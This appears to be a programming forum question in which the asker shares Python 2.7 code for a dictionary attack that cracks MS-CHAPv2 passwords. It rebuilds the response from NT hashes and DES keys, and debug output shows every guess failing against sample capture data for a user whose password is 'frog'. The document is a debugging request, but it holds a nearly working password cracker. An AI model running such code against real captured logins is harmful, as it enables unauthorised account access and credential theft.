# implementing MSCHAPv2 algorithm in python

Tags: python-2.7, hash

I am trying to write a brute-force dictionary attack on MS-CHAPv2 using python. The two pieces of data that I'm giving to the script are hex representations of the 16-byte Client Challenge Hash and the 24-byte Client Challenge Response. Using a dictionary file, I am generating the Responses using the MS-CHAPv2 algorithm:

1. Convert the client's password (dictionary entry) to little endian Unicode (16-bit).
2. Hash the converted password with MD4 --> NT_hash (16 bytes long).
3. Pad NT_hash with 0's to 21 bytes (add five 0's).
4. Split NT_hash into three 7-byte chunks ([:14], [14:28], and [28:]).
5. Add odd-parity values to each byte of each chunk, creating three 8-byte keys.
6. Encrypt the 16-byte Client Challenge Hash three times with DES, each time with a
    different 8-byte key from step 5.
7. Concatenate the results from step 6 into a response to compare with the original
    Client Challenge Response.

The problem I'm having is actually with the first two steps. I have tried several combinations of UTF encoding with various MD4 python implementations with some strange results. What is perplexing me is that in some combinations, I achieve the correct NT hash of some of my passwords, but not others. I'm using the following website to check my hashes:

```
 http://www.arsitech.com/cryptography/windows/password/
```

Can anyone tell me exactly what hashing function I should be using and/or clarify the inconsistencies I'm discovering? My code (most of it) and example output (using a small dictionary of 11 words) are shown below if that helps. The last entry in the output computes the NT hash for the password "SecREt01", and it matches what this forum post has:

```
 http://www.waraxe.us/ftopic-3900-days0-orderasc-30.html
```

...but none of the others are right. HELP!

### SOURCE CODE

```
# NOTE: these values came from a user with the password "frog"
user = "user1"
CCH16 = "9c:27:2b:1f:3c:be:53:00"
CCH16 = HexToByte(CCH16)
CCR24 = "e9:cc:b4:9a:08:46:30:8b:4e:44:17:e7:cb:a9:af:4d:85:09:8b:89:4f:8a:18:d6"
CCR24 = CCR24.replace(':', ' ')
CCR24 = CCR24.upper()

print "CCR24 -->    ", CCR24 # Client Challenge Response

# Initialize variables for loop
password = ""
password_found = False

# Find password
for guess in dictionary:

    print "Guess ---> ", guess

    # Create nt_hash for this guess using MD4 hashing algorithm.

    # TRYING TO ENCODE guess
    uGuess = guess.encode('utf-16le')
    print "uGuess --> ", uGuess
    byteUGuess = bytes(uGuess)
    print "byteUGuess --> ", byteUGuess
    hexByteUGuess = ByteToHex(byteUGuess)
    print "hexByteUGuess --> ", hexByteUGuess

    # VARIOUS MD4 IMPLEMENTATIONS
    #nt_hash = MD4.new(hexByteUGuess).hexdigest()

    #nt_hash = hashlib.new('md4', hexByteUGuess).hexdigest()

    nt_hash = nthash.encrypt(guess)

    #nt_hash = hashlib.new('md4', uGuess).hexdigest()
    #nt_hash = hmac.new(digest, user.upper().encode('utf-16le')).hexdigest()

    print "   nt_hash = ", nt_hash

    # Split nt_hash into three DES keys.
    # Add the parity bits to the DES keys to make them 8-bytes each.
    des_key_1 = HexToByte(addParity(nt_hash[0:14]))
    des_key_2 = HexToByte(addParity(nt_hash[14:28]))
    des_key_3 = HexToByte(addParity(nt_hash[28:] + "0000000000"))
    print "   des_key_1 = ", ByteToHex(des_key_1)
    print "   des_key_2 = ", ByteToHex(des_key_2)
    print "   des_key_3 = ", ByteToHex(des_key_3)

    # Create DES encryption objects with keys.
    des_1 = DES.new(des_key_1, DES.MODE_ECB)
    des_2 = DES.new(des_key_2, DES.MODE_ECB)
    des_3 = DES.new(des_key_3, DES.MODE_ECB)

    # Calculate 24-byte Client Challenge Response for this guess 
    # with the DES objects and the 16-byte Client Challenge Hash.
    ccr24_part1 = des_1.encrypt(CCH16)
    ccr24_part2 = des_2.encrypt(CCH16)
    ccr24_part3 = des_3.encrypt(CCH16)
    ccr24_guess = ByteToHex(ccr24_part1 + ccr24_part2 + ccr24_part3)
    print "   ccr24_part1 = ", ByteToHex(ccr24_part1)
    print "   ccr24_part2 = ", ByteToHex(ccr24_part2)
    print "   ccr24_part3 = ", ByteToHex(ccr24_part3)
    print "   ccr24 --> ", ccr24_guess
    print "CCR24 -----> ", CCR24, "\n"

    # Compare the guess (ccr24_guess) with the original (CCR24).
    if ccr24_guess == CCR24:
        password_found = True
        password = guess
        break

# If the password was found, display it.
# Otherwise, display fail message.      
if password_found == True:
    print "Success - Password found!"
    print "        - PASSWORD --> ", password
else:
    print "Failure - Dictionary exhausted..."
    print "        - Password not found."
```

### EXAMPLE OUTPUT

```
CCR24 -->     E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6

Guess --->  skate
uGuess -->  s k a t e  
byteUGuess -->  s k a t e  
hexByteUGuess -->  73 00 6B 00 61 00 74 00 65 00 0A 00
   nt_hash =  e4a8e60472df5891903f148b212e2100
   des_key_1 =  E5 54 38 C1 46 97 7C B0
   des_key_2 =  91 C8 0E E3 49 58 85 5D
   des_key_3 =  20 80 01 01 01 01 01 01
   ccr24_part1 =  AB C0 E5 72 51 8B 9C 23
   ccr24_part2 =  23 1E 04 09 51 71 8D 35
   ccr24_part3 =  8F 17 C3 5A 08 B8 DC 7B
   ccr24 -->  AB C0 E5 72 51 8B 9C 23 23 1E 04 09 51 71 8D 35 8F 17 C3 5A 08 B8 DC 7B
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  love
uGuess -->  l o v e 
byteUGuess -->  l o v e 
hexByteUGuess -->  6C 00 6F 00 76 00 65 00 0A 00
   nt_hash =  afe622205005339e583f020ced5596b7
   des_key_1 =  AE F2 89 45 04 80 15 67
   des_key_2 =  9E 2C 0E E0 20 67 B5 AB
   des_key_3 =  97 5B C1 01 01 01 01 01
   ccr24_part1 =  97 51 2E AB 79 15 FD A6
   ccr24_part2 =  5E 05 25 3D 9D 7C 92 D0
   ccr24_part3 =  54 0D 1F D8 18 E9 2E E3
   ccr24 -->  97 51 2E AB 79 15 FD A6 5E 05 25 3D 9D 7C 92 D0 54 0D 1F D8 18 E9 2E E3
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  dry
uGuess -->  d r y 
byteUGuess -->  d r y 
hexByteUGuess -->  64 00 72 00 79 00 0A 00
   nt_hash =  45f15741ac05cfa965f3ee726f38c116
   des_key_1 =  45 F8 54 E9 1A 61 16 9E
   des_key_2 =  A8 B3 7C 7C E6 92 BC 70
   des_key_3 =  C1 8A 80 01 01 01 01 01
   ccr24_part1 =  E0 E5 5C D3 5B 6B 0C 0B
   ccr24_part2 =  16 18 F9 DE 53 59 AA BA
   ccr24_part3 =  17 62 17 A1 93 88 2F 38
   ccr24 -->  E0 E5 5C D3 5B 6B 0C 0B 16 18 F9 DE 53 59 AA BA 17 62 17 A1 93 88 2F 38
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  music
uGuess -->  m u s i c 
byteUGuess -->  m u s i c 
hexByteUGuess -->  6D 00 75 00 73 00 69 00 63 00 0A 00
   nt_hash =  bf8704c94ab6b72ba63f9e8d3354c658
   des_key_1 =  BF C2 C1 98 94 54 DA 6E
   des_key_2 =  2A D3 8F F2 E9 68 CD A8
   des_key_3 =  C7 2C 01 01 01 01 01 01
   ccr24_part1 =  42 E1 2F FF D0 26 2F D9
   ccr24_part2 =  3A E1 52 CD 98 D8 65 F2
   ccr24_part3 =  FC 0A E7 CC 99 E0 B2 26
   ccr24 -->  42 E1 2F FF D0 26 2F D9 3A E1 52 CD 98 D8 65 F2 FC 0A E7 CC 99 E0 B2 26
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  german
uGuess -->  g e r m a n 
byteUGuess -->  g e r m a n 
hexByteUGuess -->  67 00 65 00 72 00 6D 00 61 00 6E 00 0A 00
   nt_hash =  0964cddced56685197ed7271804a903a
   des_key_1 =  08 B3 32 BA CE 6B 58 D0
   des_key_2 =  51 CB FB AE 26 8C 01 94
   des_key_3 =  91 1C 80 01 01 01 01 01
   ccr24_part1 =  1A 4C 59 1E 9F 62 F2 EB
   ccr24_part2 =  BC B5 73 C1 7D A1 F5 3E
   ccr24_part3 =  88 09 FB CD 38 EB 27 9F
   ccr24 -->  1A 4C 59 1E 9F 62 F2 EB BC B5 73 C1 7D A1 F5 3E 88 09 FB CD 38 EB 27 9F
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  flag
uGuess -->  f l a g 
byteUGuess -->  f l a g 
hexByteUGuess -->  66 00 6C 00 61 00 67 00 0A 00
   nt_hash =  98da2ab73404f97e65d877b3253e646d
   des_key_1 =  98 6D 8A 57 73 A1 13 F2
   des_key_2 =  7F 32 76 0E 7A 98 94 7C
   des_key_3 =  64 37 40 01 01 01 01 01
   ccr24_part1 =  D7 F2 66 36 63 30 CB FE
   ccr24_part2 =  B3 74 C0 C0 D9 96 71 E8
   ccr24_part3 =  61 2B 69 DE B5 7B 71 56
   ccr24 -->  D7 F2 66 36 63 30 CB FE B3 74 C0 C0 D9 96 71 E8 61 2B 69 DE B5 7B 71 56
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  frog
uGuess -->  f r o g 
byteUGuess -->  f r o g 
hexByteUGuess -->  66 00 72 00 6F 00 67 00 0A 00
   nt_hash =  78d1b2ee58428afdb5fff389c40b0b90
   des_key_1 =  79 68 6D 5D E5 C2 0B 15
   des_key_2 =  FD DA 7F FE 38 4F 10 16
   des_key_3 =  0B C8 01 01 01 01 01 01
   ccr24_part1 =  76 1D 5C 06 E9 9D 3D 69
   ccr24_part2 =  C0 44 26 C6 C3 7E F9 ED
   ccr24_part3 =  95 9D EB 10 8D 67 8D 6E
   ccr24 -->  76 1D 5C 06 E9 9D 3D 69 C0 44 26 C6 C3 7E F9 ED 95 9D EB 10 8D 67 8D 6E
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  horse
uGuess -->  h o r s e 
byteUGuess -->  h o r s e 
hexByteUGuess -->  68 00 6F 00 72 00 73 00 65 00 0A 00
   nt_hash =  ee23c8c25b9443759520c49b9b6a2756
   des_key_1 =  EF 10 F2 19 25 DC 51 86
   des_key_2 =  75 CB 49 19 49 DC 6D D5
   des_key_3 =  26 AB 80 01 01 01 01 01
   ccr24_part1 =  50 83 2A A8 E0 96 D5 76
   ccr24_part2 =  1E 79 0E 0F 46 1C F5 D9
   ccr24_part3 =  15 B1 8A EF B5 5E 5B 86
   ccr24 -->  50 83 2A A8 E0 96 D5 76 1E 79 0E 0F 46 1C F5 D9 15 B1 8A EF B5 5E 5B 86
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  word
uGuess -->  w o r d 
byteUGuess -->  w o r d 
hexByteUGuess -->  77 00 6F 00 72 00 64 00 0A 00
   nt_hash =  3cd0adcea3231e4d6f4e313390e25347
   des_key_1 =  3D 68 2A B9 EA 19 8C 3D
   des_key_2 =  4C B6 D3 C7 13 9D 43 C4
   des_key_3 =  52 A2 C1 01 01 01 01 01
   ccr24_part1 =  DB 21 74 37 87 A2 C8 B6
   ccr24_part2 =  49 E0 04 3A 77 D0 2D A5
   ccr24_part3 =  22 C9 DB F7 6D E8 5A C7
   ccr24 -->  DB 21 74 37 87 A2 C8 B6 49 E0 04 3A 77 D0 2D A5 22 C9 DB F7 6D E8 5A C7
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  dense
uGuess -->  d e n s e 
byteUGuess -->  d e n s e 
hexByteUGuess -->  64 00 65 00 6E 00 73 00 65 00 0A 00
   nt_hash =  2e46b43c23ad709512f8b1898608ef02
   des_key_1 =  2F 23 AD 86 C2 1C B5 E0
   des_key_2 =  94 89 BF 16 19 4C 19 10
   des_key_3 =  EF 80 80 01 01 01 01 01
   ccr24_part1 =  CB C1 1E AB DC 27 58 67
   ccr24_part2 =  09 25 34 A4 83 D0 C3 68
   ccr24_part3 =  56 22 E7 84 45 B2 F3 6D
   ccr24 -->  CB C1 1E AB DC 27 58 67 09 25 34 A4 83 D0 C3 68 56 22 E7 84 45 B2 F3 6D
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Guess --->  SecREt01
uGuess -->  S e c R E t 0 1 
byteUGuess -->  S e c R E t 0 1 
hexByteUGuess -->  53 00 65 00 63 00 52 00 45 00 74 00 30 00 31 00
   nt_hash =  cd06ca7c7e10c99b1d33b7485a2ed808
   des_key_1 =  CD 83 B3 4F C7 F1 43 92
   des_key_2 =  9B 8F 4C 76 75 43 68 5D
   des_key_3 =  D9 04 01 01 01 01 01 01
   ccr24_part1 =  E7 0A E5 FE 60 61 E9 ED
   ccr24_part2 =  E5 BB AF 19 78 E0 C0 A6
   ccr24_part3 =  12 04 60 76 E6 1F D1 AB
   ccr24 -->  E7 0A E5 FE 60 61 E9 ED E5 BB AF 19 78 E0 C0 A6 12 04 60 76 E6 1F D1 AB
CCR24 ----->  E9 CC B4 9A 08 46 30 8B 4E 44 17 E7 CB A9 AF 4D 85 09 8B 89 4F 8A 18 D6 

Failure - Dictionary exhausted...
        - Password not found.
```